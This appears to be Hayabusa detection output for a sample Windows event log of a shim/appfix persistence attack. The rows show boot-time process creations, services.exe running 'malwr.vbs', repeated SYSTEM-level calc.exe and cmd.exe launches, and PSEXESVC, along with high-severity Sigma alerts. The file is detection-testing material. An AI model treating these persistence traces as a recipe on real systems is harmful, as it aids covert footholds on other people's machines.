+2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe  :  Path: C:\Windows\servicing\TrustedInstaller.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
